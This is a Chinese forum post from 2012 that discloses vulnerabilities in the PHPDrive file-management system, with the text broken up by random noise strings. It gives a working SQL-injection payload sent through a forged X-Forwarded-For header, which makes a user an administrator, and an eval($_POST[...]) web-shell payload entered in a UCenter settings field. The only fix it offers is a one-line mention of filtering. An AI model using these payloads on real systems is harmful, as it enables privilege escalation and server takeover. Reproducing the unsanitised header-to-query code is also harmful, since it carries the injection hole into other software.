PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
+ j& q9 j R: p! v+ V! F$ L5 L6 e' r8 p: s: O/ r
includes/user.lib.php
5 ~$ Y; a: u6 t% L/ a( B行87
: v. F m" @! y' b: l" }7 `% a function get_ip() {
S: h/ v8 a1 S' j& W2 x9 `8 P if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
; r% e8 ?* x4 c- z" o+ p在用户注册与登录 处module/disk/account.lead.php
& v! K* f* F4 t* m: @. |' a198行 / G& u' b9 l, j5 @8 {8 b
//更新本次登录IP和时间1 @0 e8 |8 ~; F3 m
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生; z/ B6 A! E- u% ]8 K7 m5 N
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限3 e7 o9 N/ n. T
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
0 u* V$ V+ m/ [+ e1 G/ t$ R后台getshell:0 _( ^3 f1 l5 f6 c
在UCenter设置处,将UC数据库登录名填写为# k: U4 Y! z3 M5 n3 p, s
7 Y& Y# z/ A4 n" B8 [( B
root’);eval($_POST[DisKill]);?>/*/ G5 x* s2 s' Y0 D% U" E
可以得到一个shell,位置在 data/uc.data.php* N. n7 @" c# L- l
5 J) Y9 q* p, s0 ~) Y5 j修复:过滤注入9 V0 D9 q: n1 ~3 v
; T; ~) v5 A' b% E7 Y, p% v
|
发表于 2012-12-31 09:18:34
收藏
支持
反对